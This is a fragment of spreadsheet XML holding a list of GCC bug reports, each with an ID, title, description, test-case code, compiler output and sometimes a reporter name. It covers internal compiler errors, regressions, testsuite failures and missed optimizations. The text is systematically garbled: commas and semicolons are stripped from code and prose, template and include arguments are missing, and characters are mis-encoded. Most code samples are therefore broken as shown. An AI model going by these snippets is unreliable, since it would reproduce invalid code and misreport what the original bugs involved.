gcc version 4.6.2 (Gentoo 4.6.2 p1.4 pie-0.5.0) 
The complete command line that triggers the bug:
------------------------------------------------
gcc -o fail -O1 -Wall -Wextra -Wconversion -Werror -Wshadow -Wmissing-declarations -std=c89 main.c foo.c &amp;&amp; ./fail
(Note that it also fails with less arguments -O1 is all it takes)
Compiler output:
---------------
None
Preprocessed file:
------------------
Due to the nature of the bug calling an external function we could not provide a preprocessed file.</t>
  </si>
  <si>
    <t>baugesta</t>
  </si>
  <si>
    <t>GCC-53162</t>
  </si>
  <si>
    <t>unexpanded parameter packs not diagnosed in alias template used in default argument</t>
  </si>
  <si>
    <t>template
struct bool_constant
{
  static const bool value = B
}
template struct enable_if { }
template struct enable_if { typedef void type }
template
struct F
{
  template
    using SameSize = bool_constant
  template&lt;typename... B
           typename = SameSize&gt;
  F(int B...) { }
  template&lt;typename... B
           typename = typename enable_if::value&gt;::type&gt;
  F(char B...) { }
}
int main()
{
  F f1(1 2 3)
  F f2('1' 2 3)
}
$ g++ -std=c++11 t.cc
t.cc: In instantiation of â€˜struct Fâ€™:
t.cc:27:17:   required from here
t.cc:22:3: error: no type named â€˜typeâ€™ in â€˜struct enable_ifâ€™
   F(char B...) { }
   ^
The declaration of f1 should be rejected because the F(int B...) constructor's default template argument refers to the parameter pack B without expanding it but there is no error.
The declaration of f1 is rejected but with an unhelpful diagnostic if the problem was that there's no 'type' in enable_if then it should result in a substitution failure not an error. The actual problem is that B is not expanded in SameSize so the error should say so.</t>
  </si>
  <si>
    <t>GCC-81661</t>
  </si>
  <si>
    <t>[7 Regression] ICE in gimplify_modify_expr at gimplify.c:5638</t>
  </si>
  <si>
    <t>Starting from r237064 I see ICE in:
$ cat ice.i
int a b c
void d ()
{
  while (a + c &gt; b)
    a--
}
$ gcc ice.i -O3 -ftrapv
In function â€˜dâ€™:
cc1: internal compiler error: in gimplify_modify_expr at gimplify.c:5638
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It's with -mtune=generic -march=x86-64.
Thanks</t>
  </si>
  <si>
    <t>GCC-42482</t>
  </si>
  <si>
    <t>[4.5 Regression] Many graphite test failures</t>
  </si>
  <si>
    <t>On Linux/Intel64 revision 155424 gave:
FAIL: g++.dg/graphite/pr41305.C (test for excess errors)
FAIL: g++.dg/graphite/pr41305.C (test for excess errors)
FAIL: g++.dg/graphite/pr42130.C execution test
FAIL: gcc.dg/graphite/pr40281.c (test for excess errors)
FAIL: gfortran.dg/graphite/pr42393.f90  -O  (internal compiler error)
FAIL: gfortran.dg/graphite/pr42393.f90  -O  (internal compiler error)
FAIL: gfortran.dg/graphite/pr42393.f90  -O  (test for excess errors)
FAIL: gfortran.dg/graphite/pr42393.f90  -O  (test for excess errors)
Revision 155415 is OK.</t>
  </si>
  <si>
    <t>GCC-4312</t>
  </si>
  <si>
    <t>g++ accepts vector &gt;</t>
  </si>
  <si>
    <t>According item 8 of the book Effective STL by Scott Meyers code
attempting to use STL containers of auto_ptr should not
compile. Alas gcc 3.0.1 compiles the following source code tav.C
without a compiler message.
Release:
3.0.1
Environment:
System: Linux kiste 2.4.9 #7 Sun Aug 19 16:36:18 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
Linux 2.4.9
binutils 2.11.90.0.23
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.1/configure --enable-shared --enable-threads=posix --enable-languages=cc++f77objc --disable-nls --enable-clocale=gnu
How-To-Repeat:
Source code tav.C
#include 
#include 
class Widget {}
using namespace std
int main()
{
    vector &gt; widgets
}
Compiling tav.C
g++ -v tav.C -W -Wall
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: ../gcc-3.0.1/configure --enable-shared --enable-threads=posix --enable-languages=cc++f77objc --disable-nls --enable-clocale=gnu
Thread model: posix
gcc version 3.0.1
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tav.C -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase tav.C -W -Wall -version -o /tmp/cc6dwwyr.s
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 (i686-pc-linux-gnu)
	compiled by GNU C version 3.0.1.
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o /tmp/ccN4DiR9.o /tmp/cc6dwwyr.s
GNU assembler version 2.11.90.0.23 (i686-pc-linux-gnu) using BFD version 2.11.90.0.23</t>
  </si>
  <si>
    <t>GCC-31547</t>
  </si>
  <si>
    <t>Document when CPP is called and document the f95-cpp-input option</t>
  </si>
  <si>
    <t>Currently nowhere is documented that gfortran calls for .F .FPP .F90 .F95 and  .F2003 the C Preprocessor (in the traditional mode cf. PR 18428).
I don't know whether it fits better to gfortran.texi or invoke.texi.
In addition we don't document the option to call the preprocessor for files without capital letter (this is especially needed on operating systems where the file extension is case insensitive):
 -x f95-cpp-input
 -x f77-cpp-input
and how to suppress the calling of the preprocessor i.e.
 -x f77
 -x f95
f95 and f95-cpp-input are documented (or rather mentioned) in gcc(1).
However one should also add f77 and f77-cpp-input to the gcc manpage.
(Cross ref: a -cpp option is proposed for gfortran in PR 18428)</t>
  </si>
  <si>
    <t>GCC-23614</t>
  </si>
  <si>
    <t>obj-c++.dg/lookup-2.mm fails with the GNU runtime</t>
  </si>
  <si>
    <t>obj-c++.dg/lookup-2.mm fails with:
/home/pinskia/src/onetest/gcc/gcc/testsuite/obj-c++.dg/lookup-2.mm:40: error: cannot convert 
'objc_object*' to 'MyWidget*' in initialization</t>
  </si>
  <si>
    <t>GCC-3746</t>
  </si>
  <si>
    <t>compilation of mips-tfile missing mips/a.out.h</t>
  </si>
  <si>
    <t>Error while cross-compiling gcc-3.0 --target=mipsel-cass-elf
../../gcc/mips-tfile.c:675: mips/a.out.h: No such file or directory
The file mips/a.out.h is missing from the distribution (a
find on the gcc archive fails)
I have an old mips a.out.h file and its sibilings but this
doesn't work (many undefiuned symbols)
Release:
3.0
Environment:
SunOS odroz 5.7 Generic_106541-16 sun4u sparc SUNWUltra-5_10
How-To-Repeat:
./configure --target=mipsel-cass-elf make on a Solaris</t>
  </si>
  <si>
    <t>frederic.petrot</t>
  </si>
  <si>
    <t>GCC-13141</t>
  </si>
  <si>
    <t xml:space="preserve">FAIL: InvokeReturn output - source compiled test </t>
  </si>
  <si>
    <t>$ mipsel-linux-gcj --version
mipsel-linux-gcj (GCC) 3.4 20031119 (experimental)
configured as:
../gcccvsw/gcc/configure  --host=i686-pc-linux-gnu --target=mipsel-linux
--enable-languages=cc++java
--with-headers=/home/mipsel-linux/mipsel-linux/include --prefix=/home/testcvs/
--with-float=soft --with-arch=mips32
make check in libjava results in:
Executing on host:
/home/daney/mipsel-gcccvs/mipsel-linux/libjava/testsuite/../libtool --silent
--tag=GCJ --mode=link /home/daney/mipsel-gcccvs/gcc/gcj
-B/home/daney/mipsel-gcccvs/gcc/ --encoding=UTF-8
-B/home/daney/mipsel-gcccvs/mipsel-linux/./libjava/
/home/daney/gcccvsw/gcc/libjava/testsuite/libjava.lang/InvokeReturn.java  
-no-install --main=InvokeReturn -g 
-L/home/daney/mipsel-gcccvs/mipsel-linux/./libjava/.libs -lm   -o
/home/daney/mipsel-gcccvs/mipsel-linux/libjava/testsuite/InvokeReturn.exe   
(timeout = 300)
PASS: InvokeReturn compilation from source
put /home/daney/mipsel-gcccvs/mipsel-linux/libjava/testsuite/InvokeReturn.exe
/tmp/InvokeRe 
turn.exe.6071
local: /home/daney/mipsel-gcccvs/mipsel-linux/libjava/testsuite/InvokeReturn.exe
remote: /tmp/InvokeReturn.exe.6071
227 Entering Passive Mode (19216801129028)
150 Opening BINARY mode data connection for /tmp/InvokeReturn.exe.6071.
226 Transfer complete.
60974 bytes sent in 0.0038 secs (1.6e+04 Kbytes/sec)
ftp&gt; site chmod 0755 /tmp/InvokeReturn.exe.6071
200 CHMOD command successful.
ftp&gt; Executing on proton: /tmp/InvokeReturn.exe.6071    (timeout = 300)
Executing on proton: rm -f  /tmp/InvokeReturn.exe.6071    (timeout = 300)
Executed
/home/daney/mipsel-gcccvs/mipsel-linux/libjava/testsuite/InvokeReturn.exe status 0
true
false
c
5
6
34359738375
0.0
0.0
PASS: InvokeReturn execution - source compiled test
FAIL: InvokeReturn output - source compiled test
It looks like long float and double return values are not correct.</t>
  </si>
  <si>
    <t>GCC-58868</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in count_type_elements at expr.c:5495 with -std=gnu++0x</t>
  </si>
  <si>
    <t>/opt/gcc-trunk/libexec/gcc/x86_64-redhat-linux/4.9.0/cc1plus -quiet -v TelemetryVFS.ii -O0 -g0 -std=gnu++0x -version -o TelemetryVFS.s
GNU C++ (GCC) version 4.9.0 20131025 (experimental) (x86_64-redhat-linux)
	compiled by GNU C version 4.9.0 20131025 (experimental) GMP version 5.1.1 MPFR version 3.1.1 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: e6bf66d0889337cd67d51ee6eb43d8c3
TelemetryVFS.ii:12:1: internal compiler error: in count_type_elements at expr.c:5495
 }
 ^
../gcc/configure --prefix=/opt/gcc-trunk --enable-shared --enable-languages=cc++ --enable-threads=posix --enable-checking --enable-__cxa_atexit --enable-clocale=gnu --enable-initfini-array --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --disable-nls --disable-multilib --with-system-zlib --build=x86_64-redhat-linux
====================================
enum ID {
  PLACES
}
struct Histograms {
  const ID foo
}
Histograms gHistograms[] = {
  { PLACES }
}
====================================
Fairly recent comes from building firefox aurora with gcc trunk</t>
  </si>
  <si>
    <t>ferdinandw+gcc</t>
  </si>
  <si>
    <t>GCC-46084</t>
  </si>
  <si>
    <t>gcc.dg/split-4.c failed with -mavx -m32</t>
  </si>
  <si>
    <t>On Linux/ia32 gcc.dg/split-4.c failed with -mavx -m32:
[hjl@gnu-18 gcc]$ ./xgcc -B./ /export/gnu/import/git/gcc-avx/gcc/testsuite/gcc.dg/split-4.c -fsplit-stack  -m32 -mavx
[hjl@gnu-18 gcc]$ ./a.out 
Segmentation fault
[hjl@gnu-18 gcc]$ 
You can download AVX emulator from
http://software.intel.com/en-us/avx/</t>
  </si>
  <si>
    <t>GCC-27020</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] ICE on invalid array size</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 4.0.1:
===============
int x[1/0]
===============
bug.c:1: warning: division by zero
bug.c:1: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Before we got:
bug.c:1: warning: division by zero
bug.c:1: error: storage size of 'x' isn't constant</t>
  </si>
  <si>
    <t>GCC-3411</t>
  </si>
  <si>
    <t>STOP!! optimization/3407: g++ compiles at -g and -O fails</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello
 I hope this gets to the right person in time!!
 I updated my gcc compiler with patches from RedHat (I got the announcement this
 morning) and the problem went away.
 Thanks
 Ralph Peters
 gcc-gnats@gcc.gnu.org wrote:
 &gt; 
 &gt; Thank you very much for your problem report.
 &gt; It has the internal identification `optimization/3407'.
 &gt; The individual assigned to look at your
 &gt; report is: unassigned.
 &gt; 
 &gt; &gt;Category:       optimization
 &gt; &gt;Responsible:    unassigned
 &gt; &gt;Synopsis:       g++ compiles at -g and -O fails to compile at -O2 and -O3
 &gt; &gt;Arrival-Date:   Mon Jun 25 07:46:00 PDT 2001
Release:
unknown
Unformatted:
  tocompile at -O2 and -O3</t>
  </si>
  <si>
    <t>rrpeter</t>
  </si>
  <si>
    <t>GCC-59848</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/pr59747.c execution</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/pr59747.c  -fno-diagnostics-s
how-caret -fdiagnostics-color=never  -w  -O0   -lm   -o /test/gnu/gcc/objdir/gcc
/testsuite/gcc/pr59747.x0    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gc
c/gcc/testsuite/gcc.c-torture/execute/pr59747.c -fno-diagnostics-show-caret -fdi
agnostics-color=never -w -O0 -lm -o /test/gnu/gcc/objdir/gcc/testsuite/gcc/pr597
47.x0
PASS: gcc.c-torture/execute/pr59747.c compilation  -O0
Setting LD_LIBRARY_PATH to :/test/gnu/gcc/objdir/gcc::/test/gnu/gcc/objdir/gcc
spawn [open ...]
FAIL: gcc.c-torture/execute/pr59747.c execution  -O0
I don't see a return statement in fn1.</t>
  </si>
  <si>
    <t>GCC-38651</t>
  </si>
  <si>
    <t>Can't build bfin-elf-gcc (BASE_REG_CLASS undeclared).</t>
  </si>
  <si>
    <t>The code base is svn trunk. The revision is 142934.
I couldn't build bfin-elf-gcc with error below:
gcc -c  -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wmissing-format-attribute -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../../pf3gnuchains/pf3gnuchains/gcc -I../../../../pf3gnuchains/pf3gnuchains/gcc/. -I../../../../pf3gnuchains/pf3gnuchains/gcc/../include -I./../intl -I../../../../pf3gnuchains/pf3gnuchains/gcc/../libcpp/include -I/home/users/m/mo/monabuilder/osx/gmp/include -I/home/users/m/mo/monabuilder/osx/mpfr/include -I../../../../pf3gnuchains/pf3gnuchains/gcc/../libdecnumber -I../../../../pf3gnuchains/pf3gnuchains/gcc/../libdecnumber/dpd -I../libdecnumber    ../../../../pf3gnuchains/pf3gnuchains/gcc/ira-conflicts.c -o ira-conflicts.o
../../../../pf3gnuchains/pf3gnuchains/gcc/ira-conflicts.c: In function 'ira_build_conflicts':
../../../../pf3gnuchains/pf3gnuchains/gcc/ira-conflicts.c:764: error: 'BASE_REG_CLASS' undeclared (first use in this function)
../../../../pf3gnuchains/pf3gnuchains/gcc/ira-conflicts.c:764: error: (Each undeclared identifier is reported only once
../../../../pf3gnuchains/pf3gnuchains/gcc/ira-conflicts.c:764: error: for each function it appears in.)
make[2]: *** [ira-conflicts.o] Error 1
make[1]: *** [all-gcc] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>monaka</t>
  </si>
  <si>
    <t>GCC-16100</t>
  </si>
  <si>
    <t>Compiler ignores legal override of abstract subprogram</t>
  </si>
  <si>
    <t>package pak1 is
private
   type T1 is abstract tagged null record
   procedure p1(x: T1) is abstract
   generic
   package pak2 is
      type T2 is abstract new T1 with null record
   end pak2
end pak1
package pak1.pak3 is
   private
      package new_pak2 is new pak2
      type T3 is new new_pak2.T2 with null record
      procedure p1(x: T3)
end pak1.pak3
with Pak1.Pak3
package Test_248686 renames Pak1.Pak3
pak1-pak3.ads:6:12: type must be declared abstract or p1 overridden
gnatmake: test_248686.ads compilation error</t>
  </si>
  <si>
    <t>GCC-66144</t>
  </si>
  <si>
    <t>vector element operator produces very bad code</t>
  </si>
  <si>
    <t>Compiling the following input
#include 
vector char
test( vector char a vector char b)
{
        return a == b
}
generates the following output with gcc from from trunk/head with -O3 
test:
        vcmpequb 223
        xxlxor 323232
        vspltisw 1-1
        xxsel 34323334
        blr
The original first instruction already has the right answer then it's recomputed!
The inverted condition
#include 
vector char
test( vector char a vector char b)
{
        return a != b
}
produces
test:
        vcmpequb 223
        xxlxor 333333
        vspltisw 0-1
        xxsel 34323334
        blr</t>
  </si>
  <si>
    <t>mkg</t>
  </si>
  <si>
    <t>GCC-17648</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] template destructor was not called for inherited classes</t>
  </si>
  <si>
    <t>I've an unexpectet behavior while defining templates. 
In my example I show only the error. Please do not think it's my program 
itselfe.
Please compile and link the main.cpp whitout any additional files. The example 
is complete.
What I'm doing here: 
I step thousand of times through a function which create and destroy an object 
includes an subobject. 
The subobject is a child of an templete class.
On stdout you can see that the constructor was called but the the destructor 
never.
On Borland and MS it runs well. Why not in g++?</t>
  </si>
  <si>
    <t>hs</t>
  </si>
  <si>
    <t>GCC-50640</t>
  </si>
  <si>
    <t>[4.7 Regression] [OOP] FAIL: gfortran.dg/select_type_12.f03  -O  (internal compiler error)</t>
  </si>
  <si>
    <t>Between revisions 179600 (OK) and 179626 (ICE) compiling gfortran.dg/select_type_12.f03 with -O gives
/opt/gcc/work/gcc/testsuite/gfortran.dg/select_type_12.f03: In function 'MAIN__':
/opt/gcc/work/gcc/testsuite/gfortran.dg/select_type_12.f03:28:0: internal compiler error: Segmentation fault
(see http://gcc.gnu.org/ml/gcc-testresults/2011-10/msg00714.html).</t>
  </si>
  <si>
    <t>GCC-66178</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] Another label as values ICE in gen_reg_rtx at emit-rtl.c:1059</t>
  </si>
  <si>
    <t>c and c++ compiler crashes. Testcase:
void bar(int)
int test(void) {
    static int test =  ((char *)
l1:
l2:
l3:
    bar(test)
    return 0
}</t>
  </si>
  <si>
    <t>SztfG</t>
  </si>
  <si>
    <t>GCC-17264</t>
  </si>
  <si>
    <t>[hppa] Missing address increment optimization for fp load/stores</t>
  </si>
  <si>
    <t>i have a bit of loop code that looks like this:
        pds = (double *)pcs
        pdd = (double *)pcd
        while (len &gt;= 8*sizeof(double)) {
                register double r1r2r3r4r5r6r7r8
                prefetch((const void *)(pds+8))
                r1 = *pds++
                r2 = *pds++
                r3 = *pds++
                r4 = *pds++
                *pdd++ = r1
                *pdd++ = r2
                *pdd++ = r3
                *pdd++ = r4
                /* ... */
        }
gcc translates this to:
  2c:   2e 80 10 16     fldd 0(r20)fr22
  30:   37 18 3f 81     ldo -40(r24)r24
  34:   36 94 00 10     ldo 8(r20)r20
  38:   2e 80 10 17     fldd 0(r20)fr23
  3c:   36 94 00 10     ldo 8(r20)r20
  40:   2e 80 10 18     fldd 0(r20)fr24
  44:   36 94 00 10     ldo 8(r20)r20
  48:   2e 80 10 19     fldd 0(r20)fr25
  4c:   36 94 00 10     ldo 8(r20)r20
  50:   2f 40 12 16     fstd fr220(r26)
  54:   37 5a 00 10     ldo 8(r26)r26
  58:   2f 40 12 17     fstd fr230(r26)
  5c:   37 5a 00 10     ldo 8(r26)r26
  60:   2f 40 12 18     fstd fr240(r26)
  64:   37 5a 00 10     ldo 8(r26)r26
  68:   2f 40 12 19     fstd fr250(r26)
  6c:   37 5a 00 10     ldo 8(r26)r26
it is probably better to emit flddma and fstdma instructions in this case. 
(this works for ldw/stw insns)
Dave Anglin writes:
I think we need to add combiner patterns for floating point loads
and stores with base register modification.  These need to be similar
to those for ldw and stw.  See pa.md (~ line 2465 in 3.4).
I haven't done a complete scan but I think we need to add SFmode
patterns using ldw and stw DFmode patterns using ldd and std
SImode and SFmode using fldw and fstw DImode and DFmode using
fldd and fstd.  The half word and byte patterns need to be reviewed
to see that they are complete.</t>
  </si>
  <si>
    <t>GCC-5666</t>
  </si>
  <si>
    <t>ICE compiling old style C code with g++</t>
  </si>
  <si>
    <t>The following code snippet is legal old-style C code.
However it is illegal C++ code. In fact it will cause
an ICE when compiled with g++:
------------------------snip here-----------------------
void foo (i j)
    int i
    int j
{
    quus(j)
    quus(j)
}
void bar (k)
    int k
{
    int l
    struct { int a[3] } j
}
------------------------snip here-----------------------
The error message reads:
OldStyle.cpp:1: `i' was not declared in this scope
OldStyle.cpp:1: `j' was not declared in this scope
OldStyle.cpp:2: variable or field `foo' declared void
OldStyle.cpp:2: initializer list being treated as compound expression
OldStyle.cpp:2: syntax error before `int'
OldStyle.cpp:4: parse error before `{' token
OldStyle.cpp:6: ISO C++ forbids declaration of `quus' with no type
OldStyle.cpp:7: parse error before `}' token
OldStyle.cpp:9: `k' was not declared in this scope
OldStyle.cpp:10: variable or field `bar' declared void
OldStyle.cpp:10: syntax error before `int'
OldStyle.cpp:13: conflicting types for ` j'
OldStyle.cpp:3: previous declaration as `int j'
OldStyle.cpp:14: parse error before `}' token
OldStyle.cpp: In function `void __static_initialization_and_destruction_0(int 
   int)':
OldStyle.cpp:6: Internal compiler error in emit_move_insn at expr.c:2748
Please submit a full bug report [etc.]
Remark: Be sure that the file has an extension like
.cpp .cc .ii and not .c or .i (otherwise you'll invoke
the C front-end even if you use g++).
Release:
gcc version 3.1 20020204 (experimental)
Environment:
mips-sgi-irix6.5 i686-pc-linux-gnu
How-To-Repeat:
g++ -c OldStyle.cpp</t>
  </si>
  <si>
    <t>GCC-23141</t>
  </si>
  <si>
    <t>[4.1 Regression] ACATS FAIL c45651a fixed point wrong code</t>
  </si>
  <si>
    <t>Started failing between
LAST_UPDATED: Tue Jul 26 21:49:55 UTC 2005
LAST_UPDATED: Fri Jul 29 20:05:56 UTC 2005
on x86 and amd64-linux.
.. C45651A ACATS 2.5 05-07-29 23:43:34
---- C45651A CHECK THAT FOR FIXED POINT TYPES THE ABS OPERATOR
                PRODUCES CORRECT RESULTS - BASIC TYPES.
   * C45651A ABS (1.0 / 64) /= (1.0 / 64).
**** C45651A FAILED ****************************.</t>
  </si>
  <si>
    <t>GCC-27019</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with designated initializers</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 4.1.0:
======================
struct A
{
    int i
    int z[1]
}
A a = { z:{} }
======================
bug.cc:7: sorry unimplemented: non-trivial designated initializers not supported
bug.cc:7: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Before we got:
bug.cc:7: sorry unimplemented: non-trivial labeled initializers
bug.cc:7: error: initializer for scalar variable requires one element</t>
  </si>
  <si>
    <t>GCC-51829</t>
  </si>
  <si>
    <t>decltype() deduces non-const but only in a template</t>
  </si>
  <si>
    <t>The problem rejects a valid `auto expr = ...` initialization. I have reduced things to the following (full preprocessed version attached)
The template arguments aren't relevant (unused).
    #include 
    template  // without template works!
    void bug()
    {
        const auto
        const auto
        decltype(boost::spirit::qi::eps(false) | '1') *notok
        notok =  // FAILS if in template function
    }
    int main() { bug() }
By using a pointer declaration for `notok` I was able to use demangling to print the difference between the deduced types:
    boost::proto::exprns_::expr &gt; &gt; 0l&gt; const&amp; boost::proto::exprns_::expr 0l&gt; &gt; 2l&gt;
    boost::proto::exprns_::expr&lt;boost::proto::tagns_::tag::bitwise_or
    boost::proto::argsns_::list2&lt;boost::proto::exprns_::expr&lt;boost::proto::tagns_::tag::terminal
    boost::proto::argsns_::term&lt;boost::spirit::terminal_ex&lt;boost::spirit::tag::eps
    boost::fusion::vector1 &gt; &gt; 0l&gt; CONST&amp;
    boost::proto::exprns_::expr&lt;boost::proto::tagns_::tag::terminal
    boost::proto::argsns_::term 0l&gt; &gt; 2l&gt; const*
The 'CONST' I capitalized in the middle is missing when the decltype() is in a function template which prevents the assignment.
I don't know how to further reduce the testcase at this point in time. MSVC 2010 compiles the code without problem.</t>
  </si>
  <si>
    <t>GCC-408</t>
  </si>
  <si>
    <t>gcc2.95.2 ICE on optimizing legal code</t>
  </si>
  <si>
    <t>../ConnectionLib.cpp: In method 'void ZConnection::WriteAvailable()':
../ConnectionLib.cpp:1373: Internal compiler error.
Release:
GNU C++ version 2.95.2 19991024 (release) (hppa1.1-hp-hpux10.20) compiled by GNU C version 2.95.2 19991024 (release)
Environment:
HP-UX B.10.20 A 9000/735 using GAS from binutils-2.9.1
How-To-Repeat:
g++ -c -O -fno-thread-jumps -fno-defer-pop -fno-delayed-branch -fno-omit-frame-pointer -fno-default-inline -fno-inline-functions -Winline -pg -I.. -I../../include -DZAM_UNIX ../ConnectionLib.cpp -o ConnectionLib.o</t>
  </si>
  <si>
    <t>gershon</t>
  </si>
  <si>
    <t>GCC-40180</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 regression] regressions in libjava testsuite on ia64-linux</t>
  </si>
  <si>
    <t>4.4.0 and trunk 20090517 show the following regressions in the libjava testsuite compared to 4.3.
  Matthias
FAIL: TestClosureGC run
FAIL: Array_3 execution - source compiled test
FAIL: Array_3 -findirect-dispatch execution - source compiled test
FAIL: Array_3 -O3 execution - source compiled test
FAIL: Array_3 -O3 -findirect-dispatch execution - source compiled test
FAIL: Invoke_1 execution - source compiled test
FAIL: Invoke_1 -findirect-dispatch execution - source compiled test
FAIL: Invoke_1 -O3 execution - source compiled test
FAIL: Invoke_1 -O3 -findirect-dispatch execution - source compiled test
FAIL: pr83 -findirect-dispatch execution - source compiled test
FAIL: pr83 -O3 -findirect-dispatch execution - source compiled test
4.3.3 (4.4 and trunk) fail:
FAIL: getlocalvartable output
FAIL: Throw_3 -O3 output - source compiled test
FAIL: Throw_3 -O3 -findirect-dispatch output - source compiled test
build logs at:
https://buildd.debian.org/fetch.cgi?&amp;pkg=gcj-4.3&amp;ver=4.3.3-8&amp;arch=ia64&amp;stamp=1240169065&amp;file=log
https://buildd.debian.org/fetch.cgi?&amp;pkg=gcj-4.4&amp;ver=4.4.0-5&amp;arch=ia64&amp;stamp=1242603840&amp;file=log
https://buildd.debian.org/fetch.cgi?&amp;pkg=gcc-snapshot&amp;ver=20090516-1&amp;arch=ia64&amp;stamp=1242556450&amp;file=log</t>
  </si>
  <si>
    <t>GCC-13504</t>
  </si>
  <si>
    <t>Cannot mangle structure access operator</t>
  </si>
  <si>
    <t>The attached program gives an ICE in mangle.c. The problem is the ABI
gives no mangling for OBJ.MEMBER</t>
  </si>
  <si>
    <t>GCC-36589</t>
  </si>
  <si>
    <t>[4.4 Regression]: No debug info for local static variable at -O0</t>
  </si>
  <si>
    <t>Revision 136903:
http://gcc.gnu.org/ml/gcc-patches/2008-06/msg01170.html
breaks DWARF at -O0:
FAIL: gcc.dg/debug/dwarf2/var1.c scan-assembler xyzzy[^\\\\n\\\\r]+DW_AT_name</t>
  </si>
  <si>
    <t>GCC-55702</t>
  </si>
  <si>
    <t>ICE: in instrument_func_exit at tsan.c:684 with -fsanitize=thread and __builtin_return()</t>
  </si>
  <si>
    <t>Created attachment 28974
reduced testcase
Compiler output:
$ gcc -fsanitize=thread testcase.c
testcase.c: In function 'foo':
testcase.c:2:1: internal compiler error: in instrument_func_exit at tsan.c:684
 foo ()
 ^
0xa40bf8 instrument_func_exit
        /mnt/svn/gcc-trunk/gcc/tsan.c:684
0xa40bf8 tsan_pass
        /mnt/svn/gcc-trunk/gcc/tsan.c:702
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r194496 - crash</t>
  </si>
  <si>
    <t>GCC-70864</t>
  </si>
  <si>
    <t>internal compiler error: in gfc_get_symbol_decl at fortran/trans-decl.c:1403</t>
  </si>
  <si>
    <t>Created attachment 38371
code demonstrating the problem
Internal compiler error is encountered when compiling the attached code:
$ gfortran -c mymod.f90 
mymod.f90:31:0:
 end module multifab_module
internal compiler error: in gfc_get_symbol_decl at fortran/trans-decl.c:1403
0x69f0eb gfc_get_symbol_decl(gfc_symbol*)
        ../../../src/gcc-6.1.0/gcc/fortran/trans-decl.c:1403
0x6a13a7 generate_local_decl
        ../../../src/gcc-6.1.0/gcc/fortran/trans-decl.c:5220
0x66a1db do_traverse_symtree
        ../../../src/gcc-6.1.0/gcc/fortran/symbol.c:3817
0x6a1fda generate_local_vars
        ../../../src/gcc-6.1.0/gcc/fortran/trans-decl.c:5410
0x6a1fda gfc_generate_function_code(gfc_namespace*)
        ../../../src/gcc-6.1.0/gcc/fortran/trans-decl.c:6089
0x682281 gfc_generate_module_code(gfc_namespace*)
        ../../../src/gcc-6.1.0/gcc/fortran/trans.c:2058
0x63af8d translate_all_program_units
        ../../../src/gcc-6.1.0/gcc/fortran/parse.c:5600
0x63af8d gfc_parse_file()
        ../../../src/gcc-6.1.0/gcc/fortran/parse.c:5819
0x67c0d5 gfc_be_parse_file
        ../../../src/gcc-6.1.0/gcc/fortran/f95-lang.c:201</t>
  </si>
  <si>
    <t>weiqun.zhang</t>
  </si>
  <si>
    <t>GCC-26701</t>
  </si>
  <si>
    <t>std::time_get parses only 2 digits of year in en_GB locale.</t>
  </si>
  <si>
    <t>The attached test case shows that std::time_get parses only the first 2 digits of years and assumes that those are years in the 1900s. This is a loss of data. 
It gives this output in an en_GB locale:
murrayc@ubuntumurrayc:~$ ./a.out
The date as text: 01/02/2003
std::time_get result: day=1 month=2 year=1920
Maybe time_get tries to use the strftime date format only which uses 2 digits only for display in en_GB.
murrayc@ubuntumurrayc:~$ g++ --version
g++ (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu1)
Copyright (C) 2006 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
